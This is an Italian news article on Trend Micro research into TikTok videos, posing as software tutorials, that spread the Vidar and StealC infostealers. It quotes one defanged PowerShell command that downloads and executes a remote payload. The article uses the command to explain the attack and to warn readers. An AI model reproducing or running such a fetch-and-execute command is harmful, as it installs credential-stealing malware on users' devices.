4 Luglio 2025 - CYBERCRIMINI | Protezione dati

TikTok diventa terreno fertile per i malware: ecco come gli hacker aggirano i controlli e colpiscono gli utenti

Secondo una ricerca di Trend Micro, la piattaforma social viene sfruttata per diffondere malware aggressivi come Vidar e StealC attraverso video tutorial manipolati. I cybercriminali puntano su viralità e ingegneria sociale per sottrarre dati sensibili e compromettere i dispositivi.

Il volto virale e patinato di TikTok nasconde sempre più spesso una minaccia invisibile e insidiosa. Secondo un recente studio condotto da Trend Micro, la popolare piattaforma di video brevi è divenuta il nuovo canale privilegiato per i cybercriminali che diffondono malware tra ignari utenti attraverso video tutorial apparentemente innocui.

Un’evoluzione del cybercrime che sfrutta la rapidità di diffusione dei contenuti social e la fiducia degli utenti nei confronti di guide e consigli digitali. Il risultato? Centinaia di migliaia di visualizzazioni in pochi giorni e migliaia di dispositivi esposti a software malevoli progettati per sottrarre password, dati personali e credenziali bancarie.

Il nuovo volto degli attacchi digitali
I malware protagonisti di questa nuova ondata sono Vidar e StealC, due software particolarmente aggressivi capaci di infiltrarsi nei dispositivi, sottrarre dati sensibili e aggirare i sistemi di sicurezza. Gli hacker sfruttano video camuffati da tutorial o trucchi per ottenere versioni gratuite di software a pagamento — da Windows OS a Microsoft Office, fino a CapCut e Spotify.

Gli esperti di Trend Micro hanno individuato diversi account coinvolti in questa campagna malevola, tra cui @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc e @digitaldreams771, che attraverso video costruiti ad hoc raggiungono facilmente numeri impressionanti di visualizzazioni.

Come funziona l’inganno
Diversamente dalle classiche email di phishing o dai siti compromessi, questi attacchi sono ancora più subdoli perché non lasciano tracce evidenti sui server della piattaforma. I video vengono realizzati spesso con intelligenza artificiale, capaci di simulare perfetti tutorial in cui l’utente viene guidato a inserire stringhe di codice — come il comando PowerShell condiviso dall’account @gitallowed:

iex (irm hxxps://allaivo[.]me/spotify)

Un comando apparentemente innocuo, che in realtà avvia una catena di operazioni: dalla creazione di directory nascoste alla disattivazione di Windows Defender, fino all’installazione dei malware Vidar e StealC.

Le conseguenze: dal furto di dati al controllo totale del dispositivo
Gli effetti di questi attacchi possono essere devastanti. Oltre a sottrarre credenziali di accesso a servizi finanziari e dati personali, i malware riescono a mettere a segno veri e propri furti di identità e a compromettere anche le reti aziendali, creando varchi di sicurezza difficili da individuare e neutralizzare.

Il punto debole resta proprio la capacità di TikTok di rilevare tempestivamente questo tipo di minaccia, vista la rapidità con cui i contenuti si diffondono e la facilità con cui i cybercriminali possono aprire nuovi account.

Come difendersi da questa nuova minaccia
Gli esperti di sicurezza informatica lanciano l’allarme: siamo di fronte a una nuova era del cybercrime, in cui i social network diventano veicolo di attacchi sofisticati e difficilmente intercettabili.

Per tutelarsi, è indispensabile mantenere sempre aggiornati software e antivirus, affiancandoli a soluzioni di sicurezza avanzate capaci di rilevare anche le minacce meno convenzionali. Ma soprattutto è necessario adottare un approccio critico ai contenuti online: mai eseguire comandi o cliccare su link suggeriti in video tutorial se non si è assolutamente certi della loro provenienza.


LEGGI ANCHE

gratuito patrocinio e mediazione

Gratuito patrocinio e mediazione, dubbi sulla costituzionalità

Riportiamo un’interessante riflessione dal parte del Tribunale di Palermo sulla legittimità costituzionale delle norme che escludono il gratuito patrocinio in caso di una mediazione dall’esito…

Emissione e invio delle Fatture Elettroniche: le novità

L’Agenzia delle Entrate ha ridefinito le regole tecniche di conservazione, emissione e invio delle fatture elettroniche. Sono state introdotte delle novità riguardanti la tutela e…

Lavoro su piattaforma, cambia tutto: arriva la presunzione legale di subordinazione

Con il recepimento della direttiva UE 2024/2831, l’Italia si prepara a introdurre nuove regole per i lavoratori delle piattaforme digitali. Più tutele, oneri di prova…

TORNA ALLE NOTIZIE

Iso 27017
Iso 27018
Iso 9001
Iso 27001
Iso 27003
Acn
RDP DPO
CSA STAR Registry
PPPAS
Microsoft
Apple
vmvare
Linux
veeam
0
    Prodotti nel carrello
    Il tuo carrello è vuoto